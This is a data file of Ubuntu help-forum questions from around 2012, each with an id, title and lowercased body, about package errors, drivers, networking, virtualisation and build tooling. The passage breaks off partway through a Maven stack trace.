190792	ca n't upgrade 11.04 : flashplugin-nonfree : package is in very bad , inconsistent state	i ca n't upgrade from 11.04 . i 've disabled all apt sources , but still i get : the only option i am capable doing is to format and reinstall whole system , which i do n't prefer as i have tuned a lot of apps settings , etc . how can i fix this ? update : after restart , when trying to update all packages , i get this error : installarchives ( ) failed : dpkg : error processing flashplugin-nonfree ( -- remove ) : package is in very bad , inconsistent state - before trying to remove rather reinstall it . reinstalling it results in the same error . update : i found a solution at http : //ubuntuforums.org/showthread.php ? t=1485250 : sudo rm /var/lib/dpkg/info/flashplugin-nonfree.prerm sudo dpkg -- remove -- force-remove-reinstreq flashplugin-nonfree sudo dpkg -- purge -- force-remove-reinstreq flashplugin-nonfree but after doing that , the result is still the same . update : should i do what i found ? http : //ubuntuforums.org/showthread.php ? t=1369723 for pkg in `dpkg -- get-selections | awk ' $ 2== '' install '' { print $ 1 } '` ; do sudo apt-get install -y -- reinstall $ pkg ; done
190801	how can i integrate ubuntu 32 and 64 bit into a single dvd	i have both 32 and 64 bit ubuntu 12.04 iso , but how can i integrate them ( both 32 bit and 64 bit ) into a single dvd with a menu to choose from two options clearly written like `` 1 . install ubuntu 12.04 32 bit '' and `` 2 . install ubuntu 12.04 64 bit '' and also without losing the live mode
190807	mts mblaze installation error in 12.04	i have newly installed ubuntu 12.04 on my laptop , i could not connect mts mblaze to it . offline message is shown in box . i am requesting to provide complete installation steps to connect mts .
190813	problem installing ubuntu 11.04 on dell inspiron 1545	i had windows 7 installed on my system ( not the genuine copy ) , somehow it caught up into the windows update and then it started causing problem . i had ubuntu installed inside windows at that time . ( using wubi ) i `` system restored '' my windows a couple of times and it seemed to be working fine for some time . but then one time , it did not boot at all , though if i log into ubuntu it would work for me . i gave the laptop repair for windows reinstallation and they told me that i had some problem with my hard disk , which i doubt since i can log into my ubuntu installed . i tried to format everything and have just the ubuntu installed on my system . ( 11.04 ) . i make my pen drive bootable and try to install it . ( unetbootin ) but i just cant seem to get it working , initially it would ask me to install ubuntu and when i would confirm it , it would carry on with the installation but then would get stuck somehow , now it just asks me if i want to install ubuntu , and if i click on yes , it wont even start the installation . i go to the help option ( in the menu ) and here is what i get . ata3.00 : status : { drdy err } ata3.00 : error : { unc } now what is the problem , has my hard disk really crashed , does it need entire replacement ( i hope not ) , or is there something i can do . any help is appreciated . thanks .
190820	file does n't exist when trying to change permissions following the avasys image scan manual	i was finally able to connect to avasys.jp and downloaded and installed iscan_2.28.1-3.ltdl7_amd64.deb iscan-data_1.13.0-1_all.deb . the programs appeared to install correctly . i then ran sane-find-scanner and got back : found usb scanner ( vendor=0x04b8 , product=0x012d ) at libusb:001:003 i then ran lsusb and got back : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 04b8:012d seiko epson corp . perfection v10/v100 ( gt-s600/f650 ) bus 001 device 004 : id 03f0:4817 hewlett-packard bus 002 device 002 : id 093a:2510 pixart imaging , inc. optical mouse the avasys image scan manual instructed me to run chmod 0666 /proc/bus/usb/001/003 which returned chmod : can not access `/proc/bus/usb/001/003 ' : no such file or directory in 12.04 , no such directory exists . 12.04 appears to deal with usb in another way . what must i do to get the usb port 001/003 recognized by xsane and sane as the port where the scanner can be located ? what must i do to continue installing the scanner ?
190823	extract only the contents of an archived directory from within an archive	the situation i am extracting a cms from drupal-7.15.tar.gz to /var/www . when extracted normally ( with tar -xvzf filename.tar.gz ) the files end up in /var/www/drupal-7.15/ the goal i want the contents from the archived drupal-7.15/ directory to extract directly into /var/www
190824	laptop monitor stays black with an external display connected to my asus ux32vd	whether i run ubuntu as a live-usb or install it , i always have two trash bins on the unity launcher . both work , and both open the same location . this seems a bit redundant ; what could be done about it ? update : turning auto-hide on made it obvious that i have multiple launchers showing . with auto-hide off , they simply overlap , making it look like there 's a double trash icon , but with auto-hide enabled , i can display one launcher ( and therefore one trash icon ) at a time . still , two are running simultaneously . second update : this problem appears to be caused by the way ubuntu handles multiple displays on my asus ux32vd ultrabook . somehow , the laptop display can not be used while my external display is connected . it is shown in the displays list , but remains black no matter how i configure it . the external display runs at 1920x1200 , the laptop monitor should run at 1920x1080 . it therefore becomes obvious that the launcher that 's supposed to run on the laptop display , is actually displayed on the external monitor . using nomodeset as a kernel parameter as indicated here makes the laptop display inaccessible altogether , detecting the external monitor as the laptop display and making resolutions other than 1920x1200 inaccessible . that is not an option . without nomodeset , the external monitor works as it should , but the laptop monitor stays black . when i disable the laptop monitor , the external display goes black , too .
190827	trying to convert ppt to pdf using libreoffice -- -headless -convert- topdf with php script	when used below command on the command line it working file libreoffice -- headless -convert-to pdf `` . $ sourse . '' -outdir outputolder/ but , if use in php script nothing happen . can anybody provide explanation on what is the exact issue with
190828	apt-get upgrade stuck at the same package	current status i 've started to suspect this is not an ubuntu issue , but related to the internet connection here at my work . until i 'm sure , im leaving my question below : original question i 'm stuck , ca n't upgrade my system . running sudo apt-get upgrade gives me the following : mmm @ alalunga : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : ginn libgrip0 linux-generic-pae linux-headers-generic-pae linux-image-generic-pae the following packages will be upgraded : apport apport-gtk bind9-host build-essential dhcp3-client dhcp3-common dnsutils eog evince evince-common firefox firefox-branding firefox-dbg firefox-globalmenu firefox-gnome-support firefox-locale-en gimp gimp-data gir1.2-totem-1.0 glib-networking glib-networking-common glib-networking-services gnupg gpgv icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-6-plugin icedtea-netx icedtea-netx-common icedtea-plugin isc-dhcp-client isc-dhcp-common libapache2-mod-php5 libart-2.0-2 libbind9-80 libdns81 libevince3-3 libgimp2.0 libisc83 libisccc80 libisccfg82 liblwres80 libssl-dev libssl-doc libssl1.0.0 libtotem0 linux-firmware linux-libc-dev openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib openssl php-pear php5-cli php5-common php5-curl php5-dev php5-gd php5-mysql php5-xsl policykit-1-gnome python-apport python-django python-gst0.10 python-problem-report resolvconf thunderbird thunderbird-globalmenu thunderbird-gnome-support totem totem-common totem-mozilla totem-plugins xserver-xorg-input-synaptics 74 upgraded , 0 newly installed , 0 to remove and 5 not upgraded . need to get 317 mb/327 mb of archives . after this operation , 1.481 kb of additional disk space will be used . do you want to continue [ y/n ] ? get:1 http : //archive.ubuntu.com/ubuntu/ precise-updates/main openjdk-6-jre-headless i386 6b24-1.11.4-1ubuntu0.12.04.1 [ 27,3 mb ] get:2 http : //archive.ubuntu.com/ubuntu/ precise-updates/main openjdk-6-jre-headless i386 6b24-1.11.4-1ubuntu0.12.04.1 [ 27,3 mb ] get:3 http : //archive.ubuntu.com/ubuntu/ precise-updates/main openjdk-6-jre-headless i386 6b24-1.11.4-1ubuntu0.12.04.1 [ 27,3 mb ] get:4 http : //archive.ubuntu.com/ubuntu/ precise-updates/main openjdk-6-jre-headless i386 6b24-1.11.4-1ubuntu0.12.04.1 [ 27,3 mb ] get:5 http : //archive.ubuntu.com/ubuntu/ precise-updates/main openjdk-6-jre-headless i386 6b24-1.11.4-1ubuntu0.12.04.1 [ 27,3 mb ] get:6 http : //archive.ubuntu.com/ubuntu/ precise-updates/main openjdk-6-jre-headless i386 6b24-1.11.4-1ubuntu0.12.04.1 [ 27,3 mb ] get:7 http : //archive.ubuntu.com/ubuntu/ precise-updates/main openjdk-6-jre-headless i386 6b24-1.11.4-1ubuntu0.12.04.1 [ 27,3 mb ] 9 % [ 7 openjdk-6-jre-headless 27,3 mb/27,3 mb 100 % ] it keeps downloading the package openjdk-6-jre-headless , then does nothing for a while ( hanging on what 's the last line above ) , then download the package again . it 's at its 13th download attempt at the moment of writing . the actual downloads seem to be done just fine , but whatever it does after downloading seems to be failing . i tried removing openjdk-6 , but then it wanted to install openjdk-7 instead , with the same result , hanging at openjdk-7-jre-headless instead . i also tried changing servers from my local ( danish ) to the main server . no luck . it 's also keeping me from upgrading alle the other packages . what to do ? update after following instructions in the answer by @ lpanebr , it is now stuck at the linux-firmware package . so , maybe it 's a more general problem than being related to specific package ( s ) ? although it did download some packages without problems before getting stuck at linux-firmware .
190832	installed 7zip . not working . and when removing , it says to remove fileroller as well	i installed 7zip today from software centre but it wo n't showed up in launch bar ( side bar ) . i did a lot but failed to open 7zip `` window '' from any where . i clicked it in dash but then i was sent to software center showing that it is installed . i just do n't know how to start it . nor it is showing in right-click menu . i actually wanted to open flareget which is in .tar.gz . ubuntu 's default archive opener is n't opening it and showing me this : and if i try to remove 7zip , it 's saying file-roller should also be removed : what 's going on and what 's solution ?
190837	macbookpro 5,4 , brightness problem	i installed ubuntu 12.04 on my macbookpro 5,4 and it seems like everything is working well expect the brightness control . the functions keys are working and when pressing it i see the brightness bar changing , but the brightness does n't change . changing the brightness from the settings tools does n't work as well . any idea ?
190838	how to install and configure x11rdp ?	i surf the web without finding a good tutorial how to install and configure x11rdp since xrdp is making some problems and i found that x11rdp solved this issue .
190841	installing yaws server on ubuntu 12.04 ( using a cloud service )	i 'm trying to get a yaws web server working on a cloud service ( amazon aws ) . i 've compilled and installed a local copy on the server . my problem is that i ca n't get yaws to run while running on either port 8000 or port 80 . i have the following configuration in yaws.conf : port = 8000 listen = 0.0.0.0 docroot = /home/ubuntu/yaws/www/test dir_listings = true this produces the following successful launch/result : eshell v5.8.5 ( abort with ^g ) =info report==== 16-sep-2012 : :17:21:06 === yaws : using config file /home/ubuntu/yaws.conf =info report==== 16-sep-2012 : :17:21:06 === ctlfile : /home/ubuntu/.yaws/yaws/default/ctl =info report==== 16-sep-2012 : :17:21:06 === yaws : listening to 0.0.0.0:8000 for < 3 > virtual servers : - http : //domu-12-31-39-0b-1a-f6:8000 under /home/ubuntu/yaws/www/trial - =info report==== 16-sep-2012 : :17:21:06 === yaws : listening to 0.0.0.0:4443 for < 1 > virtual servers : - when i try to access the the url ( http : //ec2-72-44-47-235.compute-1.amazonaws.com ) , it never connects . i 've tried using paping to check if port 80 or 8000 is open ( http : //code.google.com/p/paping/ ) and i get a `` host can not be resolved '' error , so obviously something is n't working . i 've also tried setting the yaws.conf so its at port 80 , appearing like this : port = 8000 listen = 0.0.0.0 docroot = /home/ubuntu/yaws/www/test dir_listings = true and i get the following error : =error report==== 16-sep-2012 : :17:24:47 === yaws : failed to listen 0.0.0.0:80 : { error , eacces } =error report==== 16-sep-2012 : :17:24:47 === ca n't listen to socket : { error , eacces } =error report==== 16-sep-2012 : :17:24:47 === top proc died , terminate gserv =error report==== 16-sep-2012 : :17:24:47 === top proc died , terminate gserv =info report==== 16-sep-2012 : :17:24:47 === application : yaws exited : { shutdown , { yaws_app , start , [ normal , [ ] ] } } type : permanent { `` kernel pid terminated '' , application_controller , '' { application_start_failure , yaws , > > > > > > { shutdown , > { yaws_app , start , [ normal , [ ] ] } } } '' } i 've also opened up the port 80 using iptables . running sudo iptables -l gives this output : chain input ( policy accept ) target prot opt source destination accept tcp -- ip-192-168-2-0.ec2.internal ip-192-168-2-16.ec2.internal tcp dpt : http accept tcp -- 0.0.0.0 anywhere tcp dpt : http accept all -- anywhere anywhere ctstate related , established accept tcp -- anywhere anywhere tcp dpt : http accept tcp -- anywhere anywhere tcp dpt : http chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination in addition , i 've gone to the security group panel in the amazon aws configuration area , and add ports 80 , 8000 , and 8080 to ip source 0.0.0.0 please note : if you try to access the url of the virtual server now , it likely wo n't connect because i 'm not running currently running the yaws daemon . i 've tested it when i 've run yaws either through yaws or yaws -i thanks for the patience
190847	can i exclude files from rhythmbox library by filetype ?	i use band-in-a-box ( `` biab '' ) to create backing tracks to practice my guitar-playing , and keep the source files ( filetype .mgu ) created by biab in the same folder as the mp3 files derived from them . because i share this folder with colleagues via dropbox , i 'm not in a position to move the .mgu files elsewhere . every time i start rhythmbox ( `` rb '' ) it checks my music folders , and reports `` import errors '' on all the .mgu files . rb apparently ignores a number of unplayable filetypes in music folders - is there a way of adding .mgu to this group ? i know i can just ignore the import errors , but one of these days there will be an error i would have wanted to know about .
190848	package manager can not access repositories but internet is working	i am currently at a conference in another country and my package manager can not access repositories . my internet is working fine and i can ping the repositories or go to them in a browser , but package manager fails to access them . if i sudo apt-get update it throws something wicked happened resolving 'wwwproxy:3128 ' ( -5 - no address associated with hostname ) ( or ign 's ) . this proxy corresponds to my proxy at my office back at home , but i have disabled proxy in the package manager . scanning for best repository does n't work either , it does n't manage to connect to any . i have searched for this online and have checked things about my apt.conf file . my apt.conf contains : acquire : :http : :proxy `` http : //wwwproxy:3128/ '' ; acquire : :https : :proxy `` https : //wwwproxy:3128/ '' ; acquire : :ftp : :proxy `` ftp : //wwwproxy:3128/ '' ; acquire : :socks : :proxy `` socks : //wwwproxy:3128/ '' ; if i remove apt.conf ( or replace with blank ) , it makes no difference . i do n't see that it should since i am connecting directly ( and have set it so in my network options in package manager network settings ) i have also tried some things with resolv.conf ( changing name address to primary and secondary dns ) to no avail . ( im not sure if this would help , following other advice ) i am running 12.04 . ( i wrote this very quickly and wrote down everything i have tried to possibly shorten the troubleshooting process , have very limited time between lectures and need this sorted asap , my apologies )
190850	need software to compare two text files	is there any software available on ubuntu12.04 to compare two gedit text files for the differences between them . i have two css text files with me that i want to compare for the difference .
190854	which ati driver version did 10.04 use ?	i have a trouble with ati driver with ubuntu 12.04 lts . when i install ati driver in ubuntu 12.04 via `` additional driver '' , then i ca n't shutdown ubuntu , it showed blank ( black ) screen and my laptop still run . sometimes , my screen like that : http : //www.youtube.com/watch ? v=u9_iygesbbm but when i install ubuntu 10.04 and install ati driver via `` additional driver '' , it 's very good and no trouble i 've seen . it 's sweet but 10.04 is old and is supported to 4/2013 . so i want to know why ubuntu 10.04 works good better than 12.04 with ati driver ( in my case ) ?
190856	gedit ruby 1.9.x syntax highlighting	i have a problem with gedit and it 's way of highlighting new ruby syntax . in ruby 1.9.x , we can write hash this way : { class : 'class_name ' , id : 'uniq_id ' } instead of { : class = > 'class_name ' , : id = > 'uniq_id ' } in new syntax , gedit highlights class : as keyword instead of symbol . is there any solution to make gedit highlight ruby syntax the correct way ?
190860	how to upgrade mysql 5.5 to mysql 5.6 on 12.04 ?	i need to install mysql-server-5.6 in my ubuntu development server 12.04 . now it is running percona-server5.5 . how can i upgrade this to mysql-5.6 ?
190862	ca n't print cd cover to canon pixma ip4800	the printer happily outputs test page accurately but i can not get disk print to function at all . any assistance would be much appreciated . current driver version is canon ip4800 canon ip4800 series ver.3.40
190863	how can i disable ssh prompt from kvm remote	when i upgraded my kvm virtual machine manager to the latest version i got a question prompt every time i try to connect remotely to my machines : the authenticity of host 'kvm.local ( ip address ) ' ca n't be established . ecdsa key fingerprint is b5 : fa:0a : d0:39 : af:0a:60 : fa:04:87:6c:31:1d:13:15 . are you sure you want to continue connecting ( yes/no ) ? and when changing any setting on a vm i was obliged to type yes and then type the root password in another dialog using ubuntu 12.04 64bit
190867	can i safely unplug external hd when machine is suspended ?	does the suspend process in ubuntu ( 12.04 ) unmount the partitions on the external hard drive , and what happens if i unplug the external hard drive and resume without it plugged in ? are there any other risks around this i should be aware of ?
190871	unable to install software for huawei ec169 cdma usb modem	i 'm using this huawei ec169 cdma usb modem that 's provided as a standard by ptcl in pakistan when it comes to 3g connectivity . the issue i 'm having right now is that i have tried installing the linux sw driver provided on ptcl 's website here 's the link ; http : //ptcl.com.pk/related_pages.php ? pd_id=203 & rp_id=146 after unzipping the contents & trying to execute the commands in terminal , i 'm unsuccessful . i am just lost . i 'm on the prepaid plan basically & i need the mobile partner ui to recharge the vouchers . i 'm able to connect through the usb to internet without the standard ui ; but it 's really of no use once the credit limit runs out . if anyone of you could be kind enough to run me through the details of commands that i am supposed to execute , it 'd be really great because many others on the pakistani tech forums using linux need help with this issue . right now i 'm using lubuntu 12.04 .
190872	how to paste text from vim editor to browser ?	i need to copy text from vim to web browser since i 'm not able to use gedit as i 'm opening an sql file . how do i get this done ?
190873	frequent change of file-system to read-only	i am using ubuntu 12.04 on my relatively new laptop . initial few days , everything worked fine , but then suddenly i started getting a strange problem . after every 2-3 days , the file-system was becoming read-only . i was unable to save/download anything in the installation drive and the system hanged if i attempted to do so , after which i needed to force restart . i had to run fsck in the repair mode to get it fixed ( temporarily ) . there i used to get the following messages : '' inodes that were part of a corrupted orphan linked list found . unexpected inconsistency : run fsck manually . fsck / [ 886 ] terminated with status 4 . filesystem has errors : / '' then it stopped here and i had to restart again , after which it asked whether i want to repair or not , then the system ran properly . after a day or 2 , again i used to face exactly the same problem . the problem become more frequent in the last few days , and even after running the fsck and restarting , was not solving the problem . i re-installed the os a couple of days back , but even after that , the problem exists . though it is not that frequent now , but still at times , the file-system becomes read-only and the system stops behaving normally , and i have to run fsck in the repair mode , which makes the whole thing normal . yes i keep my laptop switched on for long hours and it does get heated up . please help . thanks , anuj
190874	16gb ssd booster on ubuntu	i 've bought a lenovo thinkpad edge laptop which has a hybrid 320gb hdd + 16gb ssd , then i 've installed ubuntu 12.04 , so now i have dual boot - ubuntu/windows7 . everything is fine but the question is - will the ubuntu use the 16gb ssd drive ? i mean will it take the advantage of it ? as far as i know windows uses it like a cache while waking up from sleep/hibernation , does n't it ?
190879	lubuntu precise - power button does n't shutdown immediately anymore	after some upgrade , my headless lubuntu 12.04 stopped shutting down on power button press . i tried to edit ~/.config/openbox/lubuntu-rc.xml without success . nowhere docs on possible alternative to lubuntu-logout ( xf86poweroff event ) . there is another way to shutdown immediately ? could i set a timeout to logout gui panel ?
190884	can not authenticate bugzilla to ldap with any user but administrator	my bugzilla4 works perfectly . i am trying to enhance our security , so i have created a special user on our domain called : srv.ldap - it should only have ldap access , and be used for this reason only . i tried to replace the user on the ldap settings in the parameters window , but no matter what i do , i keep getting an error . i even copy/pasted the domain administrator , and only changed it 's name and password : and i get the ldap connection error . i know that my ldapbinddn is correct i can connect with my administrator to the ldap from the bugzilla i can connect with an ldap browser with the srvldap user and the password i have i ca n't connect with any other account than administrator ( from bugzilla ) any ideas ?
190885	ca n't play any flash videos	recently installed lubuntu 12.04 with alternate installer on compaq evo n400c ( 850mhz piii , 20gb ata hdd , 512mb ram ) . after installation of restricted extras and medibuntu codecs i realized that it ca n't play videos . i tried midori , firefox , chrome , chromium but all the browsers say : `` shockwave plugin can not opened ... . '' i tried adobe plugin , no succes . i tried gnash , a little success because it plays the videos but it is too slow , can not enjoy the videos ! i downloaded the flv file but i could not play it with vlc/gnome player etc . any idea ?
190895	how to change what xdg-open does with ssh : //user @ ip liniks	xdg open has ignored my directives . i have found several threads regarding how to open ssh : //user @ ip links ( these are in our monitoring software ) . i have run the following commands : gconftool-2 -s /desktop/gnome/url-handlers/ssh/command '/home/dankney/bin/ssh.handler % s ' -- type string gconftool-2 -s /desktop/gnome/url-handlers/ssh/enabled -- type boolean true gconftool-2 -s /desktop/gnome/url-handlers/ssh/needs_terminal -- type boolean true yet still when i attempt to use xdg-open ( as the chrome browser does ) it attempts to sftp instead ... xdg-open ssh : //root @ 1.2.3.4 gvfs-open : sftp : //root @ 1.2.3.4/ : error opening location : the specified location is not mounted it seems to be set correctly in the registery thingy gconftool-2 -a /desktop/gnome/url-handlers/ssh command = /home/dankney/bin/ssh.handler % s needs_terminal = true enabled = true oh - here is the ls -alfh and contents of ssh.handler ls -alfh /home/dankney/bin/ssh.handler -rwxrwxr-x 1 dankney dankney 133 sep 18 21:16 /home/dankney/bin/ssh.handler* cat /home/dankney/bin/ssh.handler* # ! /bin/bash url= $ 1 protocol= $ { url// : */ } machine= $ { url//* : \/\// } machine= $ { machine % / } /usr/bin/gnome-terminal -e `` $ protocol $ machine '' what gives ? oh - btw - the shell script indeed does work if run from command line ...
190896	can toshiba 660d run ubuntu	i want to buy toshiba 660d laptop and it 's come without os . can i run ubuntu 12.04lts on it ? how can i know before i buy it ?
190898	wol stops working after booting ubuntu	after preparing my p5k motherboard to recieve wol magic packets , following this tutorial , i shutdown and booted several times to windows . the problem happens when i shutdown from ubuntu . it simply wo n't boot . the output of ethtool eth0 and part of lspci is on pastebin but here are the important parts : sudo ethtool eth0 supports wake-on : g wake-on : g current message level : 0x0000003f ( 63 ) drv probe link timer ifdown ifup lspci 2:00.0 ethernet controller : atheros communications inc. attansic l1 gigabit ethernet ( rev b0 ) i must say that if i boot to windows and shutdown without making any changes the wol works correctly again .
190899	is it possible to connect to multiple vpn networks at once via network manager ?	is it possible to connect more vpn networks at once via network manager ? i am running ubuntu 12.04.1 lts . for now i am only able to switch between preconfigured vpn connections . it`s quite annoying as i need to be connected to two or more vpn networks simultaneously . for example on windows openvpn clients , it is possible .
190902	no sound in games running on wine	i have wine1.4-rc5 installed on my ubuntu 10.04 . i tried to play call of duty 4 : modern warfare and i got this error . error during initialization : miles sound system initialization failed . make sure you have your sound card 's latest drivers and directx installed i opened wine configuration and opened the audio tab . the output device is set to system default . there is n't any drivers detected in wine . when i clicked test sound button , i ca n't hear the sound . my audio driver is nvidia [ hda nvidia ] . thanks in advance .
190905	how to use ubuntu one ?	everyone , i 'm a newbie , and i 've just installed ubuntu os a few minutes ago . i 've heard about ubuntu one so much and i want to use it , but i do n't know where to begin . could you give me some help on how to install , set up an account and start using it ( real life examples ) . thanks in advance .
190907	how do you select an arbitrary application to `` open with '' ?	i would like to open e.g . webm files using mplayer , but it is not available in the `` open with '' dialogue and ( quite frustratingly ) the dialogue no longer allows selection of the program to use from the file system . is there a conf file i can edit directly to get this done ?
190918	remote syslog hogging cpu	currently my ubuntu server is using 80 % ( +/- 10 % ) of my cpu . the time on the process is 454:26.38 . how do i troubleshoot this type of issue ? what could be causing this/how do i fix it ?
190922	will web apps be backported to 12.04 ?	i was wondering if the web app technology would be back ported to 12.04 ? i did n't know if this is where i would ask this question but i thought i would ask anyway .
190924	how to update the usb ubuntu ( iso ) with new software	i have peppermint ( based on ubuntu ) running of usb . its bascially an iso image that loads using grub4dos . problem is that i each time i load ubuntu - and want to use i.e . teamviewer or firefox ... i have to install it on the running live system . since its running from a iso image ... a reboot means the software is gone . i can edit/open the iso image using winimage ( on xp ) - would you know how i can add extra software into this iso image so next time ubuntu loads ... the new software is on there ? is there some special repositary director where i should copy the software files into and recreate the iso image ? the directory structure of this iso image is along the lines of : .disk [ boot ] casper dists install isolinux pool preseed appreciate your help with this . the software i am really interested in installing is the plugin for logmein ( for which i may need firefox ... thus i need firefox installation ) and teamviewer . thanks nakata
190926	how can i configure a logitech m705 to use stepless scrolling ?	i 'm using a logitech k750 ( keyboard ) and m705 ( mouse ) using the same ( one ! ) unifying usb connector . i paired them with my mac , but use them on my desktop with ubuntu 12.10 . works nice . just a few adjustments i 'd like to do . this mouse allows to disable the `` steps '' of the scroll wheel easily , which enables me on the mac to scroll stepless like using a touchpad . i 'm not talking about smooth scrolling but stepless scrolling ! this does somehow not work on ubuntu . is there no possibility to do this ? this mouse also supports horizontal scrolling ( not stepless ) . is there a way to adjust these features ? maybe in xorg.conf ? maybe someone has a mouse xorg.conf-section i can experiment with ? xev | grep button tells me there 's no difference between using the wheel with or without steps ( button 4 and 5 ) . so the thing should just be a question of software interpretation . at least it 's a question of making steps smaller ( 1 pixel ? ) and enable acceleration , i think .
190929	how do i disable unwanted ipxe boot attempt in libvirt/qemu-kvm ?	somehow after upgrading to 12.04 , my virtual machines always boot with an attempt to boot from the network first . see this : while i do n't have any pxe configuration set : i 've tried : to disable spice , by changing the emulator to /usr/bin/kvm from /usr/bin/kvm-spice by editing the xml . ctrl+b to configure the ipxe , but it does n't let disable this as a boot option . setting another type of nic - not an option , i need virtio for performance reasons . however , e1000e does n't work either . removing the nic : works . however , i need network . googling around . hard . lots of result is about failing configured pxe boots . not a big issue , but it increases boot times by 50-100 % here ( booting from ssd ) , so it 's relatively long and annoys me . how can i disable this and boot from virtual hard disk directly ?
190931	are virus/rootkits via ubuntu updates possible ?	i fear that just like on windows there might be ways to catch a malware/virus/rootkit via the ( automatic ) system updates . what are the changes ? is it for instance possible that a `` man in the middle '' will sniff my network traffic and can see what i am doing ( updating ) and then fake a response to me that in fact is a trojan ? does ubuntu canonical do anything to make sure that the files/programms/software from their servers is not tampered with ? i fear that linux is quite unsecure and most often the safety is just more an illusion and not substantially better then other os , like windows . given that most linux users are a tiny little bit more likely to be computer-intelligent most malware will most likely be just hidden better ? anyhow the question is how and where to look for the options to make sure i do not loose system security because a man in the middle is there in the system update of ubuntu . being abroad quite often and using many open wifis in unsecure countries usa , china i only helped myself using a tunnel vpn and updating from a virutal access in my home country . still internet routing i will never be sure so how is update secured ?
190935	ca n't adjust the brightness on a toshiba c665 laptop	i had installed ubuntu 12.04 i my toshiba laptop satellite c665-i5011 in this i am not able to change the lcd brightness . when i press fn+f6 or fn+f7 the brightness bar is changing but the lcd screen brightness is not changing . can someone help me in this to solve this ?
190938	jenkins-maven-android when running throwing the error `` android-sdk-linux/platforms '' is not a directory ''	i start setting up the jenkins-maven-android and i 'm facing an issue when running the jenkin job . my machine details $ uname -a linux development2 3.0.0-12-virtual # 20-ubuntu smp fri oct 7 18:19:02 utc 2011 x86_64 x86_64 x86_64 gnu/linux steps to install the android sdk in ubuntu https : //help.ubuntu.com/community/androidsdk since i 'm working on headless env ( ssh to client machine ) i used following command to install the platform tools android update sdk -- no-ui download apache maven and install on http : //maven.apache.org/download.html mvn -version output root @ development2 : /opt/android-sdk-linux/tools # mvn -version apache maven 3.0.4 ( r1232337 ; 2012-01-17 08:44:56+0000 ) maven home : /opt/apache-maven-3.0.4 java version : 1.6.0_24 , vendor : sun microsystems inc. java home : /usr/lib/jvm/java-6-openjdk/jre default locale : en_us , platform encoding : utf-8 os name : `` linux '' , version : `` 3.0.0-12-virtual '' , arch : `` amd64 '' , family : `` unix '' root @ development2 : /opt/android-sdk-linux/tools # ran the following two command as mention in below sudo apt-get update sudo apt-get install ia32-libs problems with eclipse and android sdk http : //developer.android.com/sdk/installing/index.html as error suggest i gave the path to android sdk in jenkins build config still im getting the error clean install -dandroid.sdk.path=/opt/android-sdk-linux can someone help me to resolve this . thanks error i 'm getting waiting for jenkins to finish collecting data mavenexecutionresult exceptions not empty message : failed to execute goal com.jayway.maven.plugins.android.generation2 : android-maven-plugin:3.1.1 : generate-sources ( default-generate-sources ) on project base-template : execution default-generate-sources of goal com.jayway.maven.plugins.android.generation2 : android-maven-plugin:3.1.1 : generate-sources failed : path `` /opt/android-sdk-linux/platforms '' is not a directory . please provide a proper android sdk directory path as configuration parameter < sdk > < path > ... < /path > < /sdk > in the plugin < configuration/ > . as an alternative , you may add the parameter to commandline : -dandroid.sdk.path= ... or set environment variable android_home . cause : execution default-generate-sources of goal com.jayway.maven.plugins.android.generation2 : android-maven-plugin:3.1.1 : generate-sources failed : path `` /opt/android-sdk-linux/platforms '' is not a directory . please provide a proper android sdk directory path as configuration parameter < sdk > < path > ... < /path > < /sdk > in the plugin < configuration/ > . as an alternative , you may add the parameter to commandline : -dandroid.sdk.path= ... or set environment variable android_home . stack trace : org.apache.maven.lifecycle.lifecycleexecutionexception : failed to execute goal com.jayway.maven.plugins.android.generation2 : android-maven-plugin:3.1.1 : generate-sources ( default-generate-sources ) on project base-template : execution default-generate-sources of goal com.jayway.maven.plugins.android.generation2 : android-maven-plugin:3.1.1 : generate-sources failed : path `` /opt/android-sdk-linux/platforms '' is not a directory . please provide a proper android sdk directory path as configuration parameter < sdk > < path > ... < /path > < /sdk > in the plugin < configuration/ > . as an alternative , you may add the parameter to commandline : -dandroid.sdk.path= ... or set environment variable android_home . at org.apache.maven.lifecycle.internal.mojoexecutor.execute ( mojoexecutor.java:225 ) at org.apache.maven.lifecycle.internal.mojoexecutor.execute ( mojoexecutor.java:153 ) at org.apache.maven.lifecycle.internal.mojoexecutor.execute ( mojoexecutor.java:145 ) at org.apache.maven.lifecycle.internal.lifecyclemodulebuilder.buildproject ( lifecyclemodulebuilder.java:84 ) at org.apache.maven.lifecycle.internal.lifecyclemodulebuilder.buildproject ( lifecyclemodulebuilder.java:59 ) at org.apache.maven.lifecycle.internal.lifecyclestarter.singlethreadedbuild ( lifecyclestarter.java:183 ) at org.apache.maven.lifecycle.internal.lifecyclestarter.execute ( lifecyclestarter.java:161 ) at org.apache.maven.defaultmaven.doexecute ( defaultmaven.java:320 ) at org.apache.maven.defaultmaven.execute ( defaultmaven.java:156 ) at org.jvnet.hudson.maven3.launcher.maven3launcher.main ( maven3launcher.java:79 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:616 ) at org.codehaus.plexus.classworlds.launcher.launcher.launchstandard ( launcher.java:329 ) at org.codehaus.plexus.classworlds.launcher.launcher.launch ( launcher.java:239 ) at org.jvnet.hudson.maven3.agent.maven3main.launch ( maven3main.java:158 ) at hudson.maven.maven3builder.call ( maven3builder.java:98 ) at hudson.maven.maven3builder.call ( maven3builder.java:64 ) at hudson.remoting.userrequest.perform ( userrequest.java:118 ) at hudson.remoting.userrequest.perform ( userrequest.java:48 ) at hudson.remoting.request $ 2.run ( request.java:326 ) at hudson.remoting.interceptingexecutorservice $ 1.call ( interceptingexecutorservice.java:72 ) at java.util.concurrent.futuretask $ sync.innerrun ( futuretask.java:334 ) at java.util.concurrent.futuretask.run ( futuretask.java:166 ) at java.util.concurrent.threadpoolexecutor.runworker ( threadpoolexecutor.java:1110 ) at java.util.concurrent.threadpoolexecutor $ worker.run ( threadpoolexecutor.java:603 ) at java.lang.thread.run ( thread.java:679 ) caused by : org.apache.maven.plugin.pluginexecutionexception : execution default-generate-sources of goal 